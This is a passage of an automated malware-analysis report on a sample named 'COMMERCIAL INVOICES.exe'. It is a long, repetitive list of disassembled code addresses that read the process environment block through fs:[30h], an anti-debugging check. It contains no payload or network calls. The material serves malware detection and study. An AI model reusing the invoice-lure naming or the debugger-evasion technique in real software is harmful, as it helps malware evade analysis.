            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C6420 mov eax, dword ptr fs:[00000030h]4_2_012C6420
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C6420 mov eax, dword ptr fs:[00000030h]4_2_012C6420
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C6420 mov eax, dword ptr fs:[00000030h]4_2_012C6420
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C6420 mov eax, dword ptr fs:[00000030h]4_2_012C6420
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C6420 mov eax, dword ptr fs:[00000030h]4_2_012C6420
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C6420 mov eax, dword ptr fs:[00000030h]4_2_012C6420
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C6420 mov eax, dword ptr fs:[00000030h]4_2_012C6420
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127A430 mov eax, dword ptr fs:[00000030h]4_2_0127A430
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01278402 mov eax, dword ptr fs:[00000030h]4_2_01278402
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01278402 mov eax, dword ptr fs:[00000030h]4_2_01278402
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01278402 mov eax, dword ptr fs:[00000030h]4_2_01278402
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012CC460 mov ecx, dword ptr fs:[00000030h]4_2_012CC460
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126A470 mov eax, dword ptr fs:[00000030h]4_2_0126A470
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126A470 mov eax, dword ptr fs:[00000030h]4_2_0126A470
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126A470 mov eax, dword ptr fs:[00000030h]4_2_0126A470
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E443 mov eax, dword ptr fs:[00000030h]4_2_0127E443
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E443 mov eax, dword ptr fs:[00000030h]4_2_0127E443
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E443 mov eax, dword ptr fs:[00000030h]4_2_0127E443
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E443 mov eax, dword ptr fs:[00000030h]4_2_0127E443
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E443 mov eax, dword ptr fs:[00000030h]4_2_0127E443
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E443 mov eax, dword ptr fs:[00000030h]4_2_0127E443
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E443 mov eax, dword ptr fs:[00000030h]4_2_0127E443
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127E443 mov eax, dword ptr fs:[00000030h]4_2_0127E443
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012FA456 mov eax, dword ptr fs:[00000030h]4_2_012FA456
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126245A mov eax, dword ptr fs:[00000030h]4_2_0126245A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123645D mov eax, dword ptr fs:[00000030h]4_2_0123645D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012464AB mov eax, dword ptr fs:[00000030h]4_2_012464AB
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012744B0 mov ecx, dword ptr fs:[00000030h]4_2_012744B0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012CA4B0 mov eax, dword ptr fs:[00000030h]4_2_012CA4B0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012FA49A mov eax, dword ptr fs:[00000030h]4_2_012FA49A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012404E5 mov ecx, dword ptr fs:[00000030h]4_2_012404E5
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127C720 mov eax, dword ptr fs:[00000030h]4_2_0127C720
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127C720 mov eax, dword ptr fs:[00000030h]4_2_0127C720
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BC730 mov eax, dword ptr fs:[00000030h]4_2_012BC730
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127273C mov eax, dword ptr fs:[00000030h]4_2_0127273C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127273C mov ecx, dword ptr fs:[00000030h]4_2_0127273C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127273C mov eax, dword ptr fs:[00000030h]4_2_0127273C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127C700 mov eax, dword ptr fs:[00000030h]4_2_0127C700
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01240710 mov eax, dword ptr fs:[00000030h]4_2_01240710
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01270710 mov eax, dword ptr fs:[00000030h]4_2_01270710
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01248770 mov eax, dword ptr fs:[00000030h]4_2_01248770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250770 mov eax, dword ptr fs:[00000030h]4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250770 mov eax, dword ptr fs:[00000030h]4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250770 mov eax, dword ptr fs:[00000030h]4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250770 mov eax, dword ptr fs:[00000030h]4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250770 mov eax, dword ptr fs:[00000030h]4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250770 mov eax, dword ptr fs:[00000030h]4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250770 mov eax, dword ptr fs:[00000030h]4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250770 mov eax, dword ptr fs:[00000030h]4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250770 mov eax, dword ptr fs:[00000030h]4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250770 mov eax, dword ptr fs:[00000030h]4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250770 mov eax, dword ptr fs:[00000030h]4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250770 mov eax, dword ptr fs:[00000030h]4_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127674D mov esi, dword ptr fs:[00000030h]4_2_0127674D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127674D mov eax, dword ptr fs:[00000030h]4_2_0127674D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127674D mov eax, dword ptr fs:[00000030h]4_2_0127674D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012CE75D mov eax, dword ptr fs:[00000030h]4_2_012CE75D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01240750 mov eax, dword ptr fs:[00000030h]4_2_01240750
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282750 mov eax, dword ptr fs:[00000030h]4_2_01282750
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282750 mov eax, dword ptr fs:[00000030h]4_2_01282750
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C4755 mov eax, dword ptr fs:[00000030h]4_2_012C4755
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012407AF mov eax, dword ptr fs:[00000030h]4_2_012407AF
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F47A0 mov eax, dword ptr fs:[00000030h]4_2_012F47A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E678E mov eax, dword ptr fs:[00000030h]4_2_012E678E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012627ED mov eax, dword ptr fs:[00000030h]4_2_012627ED
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012627ED mov eax, dword ptr fs:[00000030h]4_2_012627ED
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012627ED mov eax, dword ptr fs:[00000030h]4_2_012627ED
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012CE7E1 mov eax, dword ptr fs:[00000030h]4_2_012CE7E1
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012447FB mov eax, dword ptr fs:[00000030h]4_2_012447FB
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012447FB mov eax, dword ptr fs:[00000030h]4_2_012447FB
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124C7C0 mov eax, dword ptr fs:[00000030h]4_2_0124C7C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C07C3 mov eax, dword ptr fs:[00000030h]4_2_012C07C3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125E627 mov eax, dword ptr fs:[00000030h]4_2_0125E627
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01276620 mov eax, dword ptr fs:[00000030h]4_2_01276620
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01278620 mov eax, dword ptr fs:[00000030h]4_2_01278620
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124262C mov eax, dword ptr fs:[00000030h]4_2_0124262C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BE609 mov eax, dword ptr fs:[00000030h]4_2_012BE609
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125260B mov eax, dword ptr fs:[00000030h]4_2_0125260B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125260B mov eax, dword ptr fs:[00000030h]4_2_0125260B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125260B mov eax, dword ptr fs:[00000030h]4_2_0125260B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125260B mov eax, dword ptr fs:[00000030h]4_2_0125260B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125260B mov eax, dword ptr fs:[00000030h]4_2_0125260B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125260B mov eax, dword ptr fs:[00000030h]4_2_0125260B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125260B mov eax, dword ptr fs:[00000030h]4_2_0125260B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282619 mov eax, dword ptr fs:[00000030h]4_2_01282619
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127A660 mov eax, dword ptr fs:[00000030h]4_2_0127A660
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127A660 mov eax, dword ptr fs:[00000030h]4_2_0127A660
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01272674 mov eax, dword ptr fs:[00000030h]4_2_01272674
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130866E mov eax, dword ptr fs:[00000030h]4_2_0130866E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130866E mov eax, dword ptr fs:[00000030h]4_2_0130866E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125C640 mov eax, dword ptr fs:[00000030h]4_2_0125C640
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127C6A6 mov eax, dword ptr fs:[00000030h]4_2_0127C6A6
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012766B0 mov eax, dword ptr fs:[00000030h]4_2_012766B0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01244690 mov eax, dword ptr fs:[00000030h]4_2_01244690
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01244690 mov eax, dword ptr fs:[00000030h]4_2_01244690
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BE6F2 mov eax, dword ptr fs:[00000030h]4_2_012BE6F2
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BE6F2 mov eax, dword ptr fs:[00000030h]4_2_012BE6F2
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BE6F2 mov eax, dword ptr fs:[00000030h]4_2_012BE6F2
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BE6F2 mov eax, dword ptr fs:[00000030h]4_2_012BE6F2
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C06F1 mov eax, dword ptr fs:[00000030h]4_2_012C06F1
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C06F1 mov eax, dword ptr fs:[00000030h]4_2_012C06F1
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0127A6C7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127A6C7 mov eax, dword ptr fs:[00000030h]4_2_0127A6C7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C892A mov eax, dword ptr fs:[00000030h]4_2_012C892A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D892B mov eax, dword ptr fs:[00000030h]4_2_012D892B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BE908 mov eax, dword ptr fs:[00000030h]4_2_012BE908
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BE908 mov eax, dword ptr fs:[00000030h]4_2_012BE908
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01238918 mov eax, dword ptr fs:[00000030h]4_2_01238918
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01238918 mov eax, dword ptr fs:[00000030h]4_2_01238918
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012CC912 mov eax, dword ptr fs:[00000030h]4_2_012CC912
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01266962 mov eax, dword ptr fs:[00000030h]4_2_01266962
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01266962 mov eax, dword ptr fs:[00000030h]4_2_01266962
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01266962 mov eax, dword ptr fs:[00000030h]4_2_01266962
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0128096E mov eax, dword ptr fs:[00000030h]4_2_0128096E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0128096E mov edx, dword ptr fs:[00000030h]4_2_0128096E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0128096E mov eax, dword ptr fs:[00000030h]4_2_0128096E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012CC97C mov eax, dword ptr fs:[00000030h]4_2_012CC97C
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E4978 mov eax, dword ptr fs:[00000030h]4_2_012E4978
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E4978 mov eax, dword ptr fs:[00000030h]4_2_012E4978
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C0946 mov eax, dword ptr fs:[00000030h]4_2_012C0946
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01314940 mov eax, dword ptr fs:[00000030h]4_2_01314940
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012529A0 mov eax, dword ptr fs:[00000030h]4_2_012529A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012529A0 mov eax, dword ptr fs:[00000030h]4_2_012529A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012529A0 mov eax, dword ptr fs:[00000030h]4_2_012529A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012529A0 mov eax, dword ptr fs:[00000030h]4_2_012529A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012529A0 mov eax, dword ptr fs:[00000030h]4_2_012529A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012529A0 mov eax, dword ptr fs:[00000030h]4_2_012529A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012529A0 mov eax, dword ptr fs:[00000030h]4_2_012529A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012529A0 mov eax, dword ptr fs:[00000030h]4_2_012529A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012529A0 mov eax, dword ptr fs:[00000030h]4_2_012529A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012529A0 mov eax, dword ptr fs:[00000030h]4_2_012529A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012529A0 mov eax, dword ptr fs:[00000030h]4_2_012529A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012529A0 mov eax, dword ptr fs:[00000030h]4_2_012529A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012529A0 mov eax, dword ptr fs:[00000030h]4_2_012529A0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012409AD mov eax, dword ptr fs:[00000030h]4_2_012409AD
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012409AD mov eax, dword ptr fs:[00000030h]4_2_012409AD
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C89B3 mov esi, dword ptr fs:[00000030h]4_2_012C89B3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C89B3 mov eax, dword ptr fs:[00000030h]4_2_012C89B3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012C89B3 mov eax, dword ptr fs:[00000030h]4_2_012C89B3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012CE9E0 mov eax, dword ptr fs:[00000030h]4_2_012CE9E0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012729F9 mov eax, dword ptr fs:[00000030h]4_2_012729F9
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012729F9 mov eax, dword ptr fs:[00000030h]4_2_012729F9
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130A9D3 mov eax, dword ptr fs:[00000030h]4_2_0130A9D3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D69C0 mov eax, dword ptr fs:[00000030h]4_2_012D69C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124A9D0 mov eax, dword ptr fs:[00000030h]4_2_0124A9D0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124A9D0 mov eax, dword ptr fs:[00000030h]4_2_0124A9D0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124A9D0 mov eax, dword ptr fs:[00000030h]4_2_0124A9D0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124A9D0 mov eax, dword ptr fs:[00000030h]4_2_0124A9D0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124A9D0 mov eax, dword ptr fs:[00000030h]4_2_0124A9D0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124A9D0 mov eax, dword ptr fs:[00000030h]4_2_0124A9D0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012749D0 mov eax, dword ptr fs:[00000030h]4_2_012749D0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01262835 mov eax, dword ptr fs:[00000030h]4_2_01262835
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01262835 mov eax, dword ptr fs:[00000030h]4_2_01262835
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01262835 mov eax, dword ptr fs:[00000030h]4_2_01262835
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01262835 mov ecx, dword ptr fs:[00000030h]4_2_01262835
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01262835 mov eax, dword ptr fs:[00000030h]4_2_01262835
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01262835 mov eax, dword ptr fs:[00000030h]4_2_01262835
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E483A mov eax, dword ptr fs:[00000030h]4_2_012E483A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E483A mov eax, dword ptr fs:[00000030h]4_2_012E483A
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127A830 mov eax, dword ptr fs:[00000030h]4_2_0127A830
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012CC810 mov eax, dword ptr fs:[00000030h]4_2_012CC810
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D6870 mov eax, dword ptr fs:[00000030h]4_2_012D6870
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D6870 mov eax, dword ptr fs:[00000030h]4_2_012D6870
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012CE872 mov eax, dword ptr fs:[00000030h]4_2_012CE872
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012CE872 mov eax, dword ptr fs:[00000030h]4_2_012CE872
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01252840 mov ecx, dword ptr fs:[00000030h]4_2_01252840
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01270854 mov eax, dword ptr fs:[00000030h]4_2_01270854
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01244859 mov eax, dword ptr fs:[00000030h]4_2_01244859
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01244859 mov eax, dword ptr fs:[00000030h]4_2_01244859
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01240887 mov eax, dword ptr fs:[00000030h]4_2_01240887
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012CC89D mov eax, dword ptr fs:[00000030h]4_2_012CC89D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130A8E4 mov eax, dword ptr fs:[00000030h]4_2_0130A8E4
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127C8F9 mov eax, dword ptr fs:[00000030h]4_2_0127C8F9
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127C8F9 mov eax, dword ptr fs:[00000030h]4_2_0127C8F9
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126E8C0 mov eax, dword ptr fs:[00000030h]4_2_0126E8C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_013108C0 mov eax, dword ptr fs:[00000030h]4_2_013108C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126EB20 mov eax, dword ptr fs:[00000030h]4_2_0126EB20
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126EB20 mov eax, dword ptr fs:[00000030h]4_2_0126EB20
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01308B28 mov eax, dword ptr fs:[00000030h]4_2_01308B28
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01308B28 mov eax, dword ptr fs:[00000030h]4_2_01308B28
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01314B00 mov eax, dword ptr fs:[00000030h]4_2_01314B00
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BEB1D mov eax, dword ptr fs:[00000030h]4_2_012BEB1D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BEB1D mov eax, dword ptr fs:[00000030h]4_2_012BEB1D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BEB1D mov eax, dword ptr fs:[00000030h]4_2_012BEB1D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BEB1D mov eax, dword ptr fs:[00000030h]4_2_012BEB1D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BEB1D mov eax, dword ptr fs:[00000030h]4_2_012BEB1D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BEB1D mov eax, dword ptr fs:[00000030h]4_2_012BEB1D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BEB1D mov eax, dword ptr fs:[00000030h]4_2_012BEB1D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BEB1D mov eax, dword ptr fs:[00000030h]4_2_012BEB1D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BEB1D mov eax, dword ptr fs:[00000030h]4_2_012BEB1D
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0123CB7E mov eax, dword ptr fs:[00000030h]4_2_0123CB7E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F4B4B mov eax, dword ptr fs:[00000030h]4_2_012F4B4B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F4B4B mov eax, dword ptr fs:[00000030h]4_2_012F4B4B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01312B57 mov eax, dword ptr fs:[00000030h]4_2_01312B57
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01312B57 mov eax, dword ptr fs:[00000030h]4_2_01312B57
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01312B57 mov eax, dword ptr fs:[00000030h]4_2_01312B57
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01312B57 mov eax, dword ptr fs:[00000030h]4_2_01312B57
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E8B42 mov eax, dword ptr fs:[00000030h]4_2_012E8B42
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D6B40 mov eax, dword ptr fs:[00000030h]4_2_012D6B40
